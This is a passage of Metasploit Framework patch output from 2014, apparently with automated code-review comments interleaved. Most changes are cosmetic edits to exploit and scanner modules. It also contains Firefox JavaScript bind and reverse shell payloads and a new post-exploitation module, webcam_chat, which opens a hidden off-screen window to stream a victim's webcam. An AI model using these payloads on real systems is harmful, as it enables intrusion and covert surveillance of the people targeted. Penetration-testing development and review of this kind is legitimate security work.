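Review bot: The context line `name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n'])` in the `@@ -116,16 +106,16 @@` hunk passes an Array as the options argument. Ruby documents an Integer flag mask (or nil/false) in that position and, as far as I know, has treated any other truthy value simply as "ignore case", so `Regexp::EXTENDED` is probably not applied and matching is case-insensitive instead. If the flag and the encoding were meant, they should be separate arguments: `Regexp.new(datastore['MATCH'], Regexp::EXTENDED, 'n')`. A malformed MATCH value also raises RegexpError here; whether that is rescued cannot be seen, because the enclosing method starts and ends outside the hunk.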
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This module can be used to extract the site - and projects usernames and hashes. + and project usernames and hashes. }, 'References' => [ diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index b06f16ec29..92bca9cb55 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary row.each { |val| @hashes << val.value.to_s } end - print_good("#{ip} Found Users & Password Hashes:") + print_good("#{ip} - Found user and password hashes:") end credinfo = "" @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 44f87f1508..07a4840766 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 68a59454ac..ab88d07bfb 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb 
@@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index 9e77e808f0..c7fe29df13 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -19,11 +19,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in Symantec Workspace Streaming. The vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the - as_agent.exe service, which allows to upload arbitrary files under the server root. - This module abuses the auto deploy feature at the JBoss as_ste.exe's instance in order + as_agent.exe service, which allows for uploading arbitrary files under the server root. + This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order to achieve remote code execution. This module has been tested successfully on Symantec Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single - machine deployment, and also at the backend role in a multiple machines deployment + machine deployment, and also in the backend role in a multiple machine deployment. }, 'Author' => [ From dc0e649a10b7a5a706cbdb88992bd7d6c2d09fcf Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Mon, 19 May 2014 09:21:07 -0500 Subject: [PATCH 348/853] Clean up case statement --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 7c26bbd1dc..c8ece7ac37 100644 
--- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary when 404 # Do not return by default, only display in verbose mode vprint_status("#{full_url} - not found (#{res.code})") - when 400,500 + when 400, 500 print_status("#{full_url} - produced a server error (#{res.code})") - when 301, 302, + when 301, 302 print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") @valid_urls << full_url << "\n" when 307 From e26dee5e22ba0e7327580da2801f2cc3f913d7ad Mon Sep 17 00:00:00 2001 From: Karmanovskii <fnsnic@gmail.com> Date: Mon, 19 May 2014 21:32:30 +0400 Subject: [PATCH 349/853] Update mybb_get_type_db.rb 19/05/2014 I deleted - #return Exploit::CheckCode::Unknown # necessary ???? --- modules/auxiliary/gather/mybb_get_type_db.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e007166e77..b96e7a1a64 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -65,7 +65,6 @@ class Metasploit3 < Msf::Auxiliary php_version = " PHP Version: #{php_version}".ljust(40) else php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? end #Check Web-Server From b84379ab3b8d88895270c9c7928c550aad4cdb5e Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 22:00:09 +0100 Subject: [PATCH 350/853] Note about EXE::Custom --- modules/exploits/windows/local/bypassuac_injection.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index e297bbe31e..3ec7214054 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb 
@@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). + If specifying EXE::Custom your DLL should call ExitProcess() after starting + your payload in a seperate process. }, 'License' => MSF_LICENSE, 'Author' => [ From 7cabfacfa379269707099afddef3e4f84ca5b22b Mon Sep 17 00:00:00 2001 From: Jonas Vestberg <bugch3ck@users.noreply.github.com> Date: Tue, 20 May 2014 01:43:19 +0200 Subject: [PATCH 351/853] Test adobe_flash_pixel_bender_bof on Safari 5.1.7 Added browser-requirement for Safari after successful test using Safari 5.1.7 with Adobe Flash Player 13.0.0.182 running on Windows 7 SP1. --- .../exploits/windows/browser/adobe_flash_pixel_bender_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index c29080ed3c..371489b0fd 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, + :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::SAFARI}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From 8a9c005f13329673b790caec314bafeb05fa0231 Mon Sep 17 00:00:00 2001 
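Review bot: The `:ua_name` lambda in adobe_flash_pixel_bender_bof.rb now chains three `==` comparisons on one long line; a membership test is shorter and easier to extend, `:ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF, Msf::HttpClients::SAFARI].include?(ua) },`. The commit message records a single tested combination (Safari 5.1.7 with Flash Player 13.0.0.182 on Windows 7 SP1), and a comment next to the requirement naming that combination would tell later readers how far the Safari entry has been verified.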
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 20 May 2014 17:43:07 -0500 Subject: [PATCH 352/853] Add URL --- modules/auxiliary/admin/http/katello_satellite_priv_esc.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb index 35d9cbef28..c6ccab6c40 100644 --- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb @@ -23,7 +23,8 @@ class Metasploit4 < Msf::Auxiliary 'References' => [ ['CVE', '2013-2143'], - ['CWE', '862'] + ['CWE', '862'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=970849'] ], 'DisclosureDate' => 'Mar 24 2014' ) From af415c941b2d6d61f87b70aaa5c39dcd41916bd4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 20 May 2014 18:44:28 -0500 Subject: [PATCH 353/853] [SeeRM #8803] Avoid false positives when checking fb_cnct_group --- modules/exploits/windows/misc/fb_cnct_group.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 3c8a3deed1..7402cdb077 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -94,9 +94,6 @@ class Metasploit3 < Msf::Exploit::Remote opcode = data.unpack("N*")[0] version = data.unpack("N*")[1] if opcode == 3 # Accept - if [ 0xffff800b, 0xffff800c ].include?(version) - return Exploit::CheckCode::Vulnerable - end return Exploit::CheckCode::Detected end From b9464e626edf23821909d2db224c5e31cd86f3ad Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 21 May 2014 10:18:03 -0500 Subject: [PATCH 354/853] Delete unnecessary line --- modules/exploits/windows/misc/fb_cnct_group.rb | 1 - 1 file changed, 1 deletion(-) 
diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 7402cdb077..118d832d64 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -92,7 +92,6 @@ class Metasploit3 < Msf::Exploit::Remote disconnect opcode = data.unpack("N*")[0] - version = data.unpack("N*")[1] if opcode == 3 # Accept return Exploit::CheckCode::Detected end From 14b796acbfcedbdd78d77aa5240d741ba9b1db1d Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Wed, 21 May 2014 15:32:29 -0500 Subject: [PATCH 355/853] First stab at refactoring webrtc mixin. --- .../remote/firefox_privilege_escalation.rb | 3 +- lib/msf/core/payload/firefox.rb | 33 +++++++ lib/msf/core/post.rb | 1 + lib/msf/core/post/webrtc.rb | 64 ++++++++++++++ .../extensions/stdapi/webcam/webcam.rb | 61 +------------ .../browser/firefox_proto_crmfrequest.rb | 2 + .../singles/firefox/shell_bind_tcp.rb | 19 ++--- .../singles/firefox/shell_reverse_tcp.rb | 9 +- .../singles/firefox/shell_reverse_tcp_ssl.rb | 36 ++++++++ .../singles/nodejs/shell_reverse_tcp_ssl.rb | 7 -- modules/post/firefox/gather/webcam_chat.rb | 85 +++++++++++++++++++ 11 files changed, 236 insertions(+), 84 deletions(-) create mode 100644 lib/msf/core/post/webrtc.rb create mode 100644 modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb create mode 100644 modules/post/firefox/gather/webcam_chat.rb diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index b36e245414..0b39034603 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb 
@@ -16,7 +16,8 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # calling the "send" function, or by just returning the value in +js+ def js_exec(js) print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]") + token = "[[#{Rex::Text.rand_text_alpha(8)}]]" + session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}") session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) end diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb index bdd10154a7..8921f0124a 100644 --- a/lib/msf/core/payload/firefox.rb +++ b/lib/msf/core/payload/firefox.rb @@ -16,6 +16,38 @@ module Msf::Payload::Firefox | end + # Javascript source of readUntilToken(s) + # Continues reading the stream as data is available, until a pair of + # command tokens like [[aBcD123ffh]] [[aBcD123ffh]] is consumed. + # + # Returns a function that can be passed to the #onDataAvailable callback of + # nsIInputStreamPump that will buffer until a second token is read, or, in + # the absence of any tokens, a newline character is read. + # + # @return [String] javascript source code that exposes the readUntilToken(cb) function + def read_until_token_source + %Q| + var readUntilToken = function(cb) { + Components.utils.import("resource://gre/modules/NetUtil.jsm"); + + var buffer = '', m = null; + return function(request, context, stream, offset, count) { + buffer += NetUtil.readInputStreamToString(stream, count); + if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) { + + if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) { + cb(m[2]); + buffer = ''; + } + } else if (buffer.indexOf("\\n") > -1) { + cb(buffer); + buffer = ''; + } + }; + }; + | + end + # Javascript source code of readFile(path) - synchronously reads a file and returns # its contents. The file is deleted immediately afterwards. # @@ -189,4 +221,5 @@ module Msf::Payload::Firefox (new ActiveXObject("WScript.Shell")).Run(cmd, 0, true); | end + end 
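Review bot: The doc comment on `read_until_token_source` gives `[[aBcD123ffh]]` as the example token, which is ten characters with digits, while the pattern in the function accepts exactly eight word characters (`\w{8}`) and `js_exec` builds the token from `Rex::Text.rand_text_alpha(8)`; the example should be an eight-letter token so that comment and code agree. The comment should also state two behaviours visible in the body: `buffer = ''` after a completed pair discards anything that followed the closing token in the same read, and the newline fallback passes `buffer` to `cb` untrimmed. The second differs from the `onDataAvailable` handlers replaced in shell_bind_tcp.rb and shell_reverse_tcp.rb later in this patch, which called `.trim()` on the data.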
diff --git a/lib/msf/core/post.rb b/lib/msf/core/post.rb index d9574910be..0e37cfb6dd 100644 --- a/lib/msf/core/post.rb +++ b/lib/msf/core/post.rb @@ -9,6 +9,7 @@ class Msf::Post < Msf::Module require 'msf/core/post_mixin' require 'msf/core/post/file' + require 'msf/core/post/webrtc' require 'msf/core/post/linux' require 'msf/core/post/osx' diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb new file mode 100644 index 0000000000..d58c1ecf91 --- /dev/null +++ b/lib/msf/core/post/webrtc.rb 
@@ -0,0 +1,64 @@ +# -*- coding: binary -*- + +module Msf::Post::WebRTC + + # + # Connects to a video chat session as an answerer + # + # @param offerer_id [String] The offerer's ID in order to join the video chat + # @return void + # + def connect_video_chat(server, channel, offerer_id) + interface = load_interface('answerer.html') + api = load_api_code + + tmp_api = Tempfile.new('api.js') + tmp_api.binmode + tmp_api.write(api) + tmp_api.close + + interface = interface.gsub(/\=SERVER\=/, server) + interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path) + interface = interface.gsub(/\=RHOST\=/, rhost) + interface = interface.gsub(/\=CHANNEL\=/, channel) + interface = interface.gsub(/\=OFFERERID\=/, offerer_id) + + tmp_interface = Tempfile.new('answerer.html') + tmp_interface.binmode + tmp_interface.write(interface) + tmp_interface.close + + found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path) + unless found_local_browser + raise RuntimeError, "Unable to find a suitable browser to connect to the target" + end + end + + + # + # Returns the webcam interface + # + # @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html) + # @return [String] The HTML interface code + # + def load_interface(html_name) + interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name) + interface_code = '' + ::File.open(interface_path) { |f| interface_code = f.read } + interface_code + end + + + # + # Returns the webcam API + # + # @return [String] The WebRTC lib code + # + def load_api_code + js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js') + api = '' + ::File.open(js_api_path) { |f| api = f.read } + api + end + +end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 436446b53b..31a5c1ef6e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb 
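Review bot: `connect_video_chat` in the new lib/msf/core/post/webrtc.rb depends on two things the file does not provide: it calls `rhost`, which has to come from whatever class includes the mixin, and it uses `Tempfile` without a `require 'tempfile'` at the top. Adding the require and a line in the module comment such as `# Including classes must respond to #rhost` would let the mixin be read and loaded on its own. The method comment documents only `offerer_id`; `# @param server [String]` and `# @param channel [String]` entries are missing. `load_interface` and `load_api_code` each open a file only to read it whole, which `::File.read(interface_path)` and `::File.read(js_api_path)` express directly.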
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -18,6 +18,7 @@ class Webcam include Msf::Post::Common include Msf::Post::File + include Msf::Post::WebRTC def initialize(client) @client = client @@ -195,66 +196,6 @@ class Webcam end end - - # - # Connects to a video chat session as an answerer - # - # @param offerer_id [String] The offerer's ID in order to join the video chat - # @return void - # - def connect_video_chat(server, channel, offerer_id) - interface = load_interface('answerer.html') - api = load_api_code - - tmp_api = Tempfile.new('api.js') - tmp_api.binmode - tmp_api.write(api) - tmp_api.close - - interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path) - interface = interface.gsub(/\=RHOST\=/, rhost) - interface = interface.gsub(/\=CHANNEL\=/, channel) - interface = interface.gsub(/\=OFFERERID\=/, offerer_id) - - tmp_interface = Tempfile.new('answerer.html') - tmp_interface.binmode - tmp_interface.write(interface) - tmp_interface.close - - found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path) - unless found_local_browser - raise RuntimeError, "Unable to find a suitable browser to connect to the target" - end - end - - - # - # Returns the webcam interface - # - # @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html) - # @return [String] The HTML interface code - # - def load_interface(html_name) - interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name) - interface_code = '' - ::File.open(interface_path) { |f| interface_code = f.read } - interface_code - end - - - # - # Returns the webcam API - # - # @return [String] The WebRTC lib code - # - def load_api_code - js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js') - api = '' - ::File.open(js_api_path) { |f| api = f.read } - api - end - end end; end; end; end; end; end 
diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 2b24b83cc1..e8f6441a73 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -67,9 +67,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending the malicious addon") send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' }) else + File.write('/tmp/ff.html', generate_html(target_info)) print_status("Sending HTML") send_response_html(cli, generate_html(target_info)) end + end def generate_html(target_info) diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index 9a91867fb7..1312b3c3fe 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb +++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -23,22 +23,14 @@ module Metasploit3 'Arch' => ARCH_FIREFOX, 'Handler' => Msf::Handler::BindTcp, 'Session' => Msf::Sessions::CommandShell, - 'PayloadType' => 'firefox', - 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + 'PayloadType' => 'firefox' )) end - # - # Constructs the payload - # - def generate - super + command_string - end - # # Returns the JS string to use for execution # - def command_string + def generate %Q| (function(){ Components.utils.import("resource://gre/modules/NetUtil.jsm"); @@ -59,16 +51,17 @@ module Metasploit3 } }; + #{read_until_token_source} + var clientListener = function(outStream) { return { onStartRequest: function(request, context) {}, onStopRequest: function(request, context) {}, - onDataAvailable: function(request, context, stream, offset, count) { - var data = NetUtil.readInputStreamToString(stream, count).trim(); + onDataAvailable: readUntilToken(function(data) { runCmd(data, function(err, output) { if(!err) outStream.write(output, output.length); }); - } + }) }; }; 
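Review bot: The added `File.write('/tmp/ff.html', generate_html(target_info))` in the `else` branch of firefox_proto_crmfrequest.rb looks like a debugging leftover and should be removed before merge. It writes to a fixed, predictable name in a world-writable directory on the machine running the framework for every request served, so it will follow a symlink another local user has placed there, and it fails on hosts that have no `/tmp`. It also calls `generate_html` a second time, so the copy on disk is not necessarily the page that `send_response_html` returns. The enclosing method starts outside the hunk.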
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb index 92d32aa8c4..e3a8d572fe 100644 --- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb +++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb @@ -6,6 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' module Metasploit3 @@ -45,15 +46,16 @@ module Metasploit3 .createInstance(Components.interfaces.nsIInputStreamPump); pump.init(inStream, -1, -1, 0, 0, true); + #{read_until_token_source} + var listener = { onStartRequest: function(request, context) {}, onStopRequest: function(request, context) {}, - onDataAvailable: function(request, context, stream, offset, count) { - var data = NetUtil.readInputStreamToString(stream, count).trim(); + onDataAvailable: readUntilToken(function(data) { runCmd(data, function(err, output) { if (!err) outStream.write(output, output.length); }); - } + }) }; #{run_cmd_source} @@ -63,4 +65,5 @@ module Metasploit3 EOS end + end diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb new file mode 100644 index 0000000000..1a073d9fb5 --- /dev/null +++ b/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb 
@@ -0,0 +1,36 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Firefox + include Msf::Sessions::CommandShellOptions + + def initialize(info={}) + super(merge_info(info, + 'Name' => 'Command Shell, Reverse TCP SSL (via Firefox XPCOM script)', + 'Description' => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API}, + 'Author' => ['joev'], + 'License' => BSD_LICENSE, + 'Platform' => 'firefox', + 'Arch' => ARCH_FIREFOX, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'firefox' + )) + end + + def generate + # reverse_connect(:ssl => true) + "" + end + +end diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index 5e14658ae1..c6aa8cba84 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -30,13 +30,6 @@ module Metasploit3 )) end - # - # Constructs the payload - # - def generate - super + command_string - end - # # Returns the JS string to use for execution # diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb new file mode 100644 index 0000000000..ee4450bde7 --- /dev/null +++ b/modules/post/firefox/gather/webcam_chat.rb 
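Review bot: `generate` in the new firefox/shell_reverse_tcp_ssl.rb returns an empty string, with the intended call left behind as the comment `# reverse_connect(:ssl => true)`, so the module is registered with a name, handler and session type but produces nothing. Until the SSL variant exists, the file is better kept out of the tree, or its `Description` should say plainly that it is a placeholder. The header comment reads `http//metasploit.com/download`; the colon after `http` is missing.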
@@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'json' +require 'msf/core' + +class Metasploit3 < Msf::Post + + include Msf::Exploit::Remote::FirefoxPrivilegeEscalation + include Msf::Post::WebRTC + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Firefox Webcam Chat on Privileged Javascript Shell', + 'Description' => %q{ + This module allows streaming a webcam from a Firefox Privileged Javascript Shell. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'joev' ], + 'DisclosureDate' => 'May 13 2014' + )) + + register_options([ + OptBool.new('CLOSE', [false, "Forcibly close previous chat session", false]), + OptInt.new('TIMEOUT', [false, "End the chat session after this many seconds", -1]), + OptString.new('ICESERVER', [true, "The ICE server that sets up the P2P connection", 'wsnodejs.jit.su:80']) + ], self.class) + end + + def run + server = datastore['ICESERVER'] + offerer_id = Rex::Text.rand_text_alphanumeric(10) + channel = Rex::Text.rand_text_alphanumeric(20) + + result = js_exec(js_payload(server, offerer_id, channel)) + + if result.present? 
+ print_status result + connect_video_chat(server, channel, offerer_id) + end + end + + def js_payload(server, offerer_id, channel) + interface = load_interface('offerer.html') + api = load_api_code + + interface.gsub!(/\=SERVER\=/, server) + interface.gsub!(/\=CHANNEL\=/, channel) + interface.gsub!(/\=OFFERERID\=/, offerer_id) + + if datastore['TIMEOUT'] > 0 + api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT']*1000}); " + end + + interface.gsub!('<script src="api.js"> </script>', "<script>#{api}</script>") + + url = if datastore['CLOSE'] + '"about:blank"' + else + '"data:text/html;base64,"+html' + end + + %Q| + (function(send){ + try { + var b64 = Components.utils.import("resource://gre/modules/Services.jsm").atob; + var AppShellService = Components + .classes["@mozilla.org/appshell/appShellService;1"] + .getService(Components.interfaces.nsIAppShellService); + + var html = "#{Rex::Text.encode_base64(interface)}"; + var url = "data:text/html;base64,"+html; + AppShellService.hiddenDOMWindow.open(url, "_self"); + AppShellService.hiddenDOMWindow.moveTo(-55555,-55555); + send("Streaming webcam..."); + } catch (e) { + send(e); + } + })(send); + |.gsub(/\s+/, '') + end + +end From 765419627bf9114df8a4eb97ab04d13df7c38b3f Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 21 May 2014 16:18:36 -0500 Subject: [PATCH 356/853] Demote datastore edits to info status SeeRM #8498 --- tools/msftidy.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 8c5d82458d..6c585dfd6e 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb 
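Review bot: The `TIMEOUT` option registered in webcam_chat.rb (default `-1`, "End the chat session after this many seconds") has the same name as the value `js_exec` passes to `session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])` in the FirefoxPrivilegeEscalation hunk earlier in this patch. As far as these hunks show, one setting therefore drives both the chat duration and the read timeout, and the default gives the read a negative value. A separate name for the chat limit, for example `OptInt.new('CHAT_TIMEOUT', [false, "End the chat session after this many seconds", -1])`, keeps the two meanings apart. The default `ICESERVER` is a third-party host on port 80, and the option text should say that session signalling passes through that server; `require 'json'` is not used anywhere in the file.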
@@ -471,9 +471,12 @@ class Msftidy error("Writes to stdout", idx) end - # do not change datastore in code + # You should not change datastore in code. For reasons. See + # RM#8498 for discussion, starting at comment #16: + # + # https://dev.metasploit.com/redmine/issues/8498#note-16 if ln =~ /(?<!\.)datastore\[["'][^"']+["']\]\s*=(?![=~>])/ - error("datastore is modified in code: #{ln}", idx) + info("datastore is modified in code: #{ln}", idx) end # do not read Set-Cookie header (ignore commented lines) From d9fbf861d2b74c5dc9241b6d51db015daa58b9f0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 21 May 2014 16:20:57 -0500 Subject: [PATCH 357/853] Add an environment option to suppress info msgs It's often you want counts of just WARN and ERROR messages, and don't want to spam yourself with INFO messages that you don't intend to address anyway. This is most often the case with CI, such as with https://travis-ci.org/todb-r7/metasploit-framework --- tools/msftidy.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 6c585dfd6e..7d83eed8c2 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -11,6 +11,7 @@ require 'find' require 'time' CHECK_OLD_RUBIES = !!ENV['MSF_CHECK_OLD_RUBIES'] +SUPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES'] if CHECK_OLD_RUBIES require 'rvm' @@ -91,6 +92,7 @@ class Msftidy # Display an info message. Info messages do not alter the exit status. # def info(txt, line=0) + return if SUPRESS_INFO_MESSAGES line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" end From fa353e6bd953c9d8bccca6615cd2f9a220ccd2e4 Mon Sep 17 00:00:00 2001 
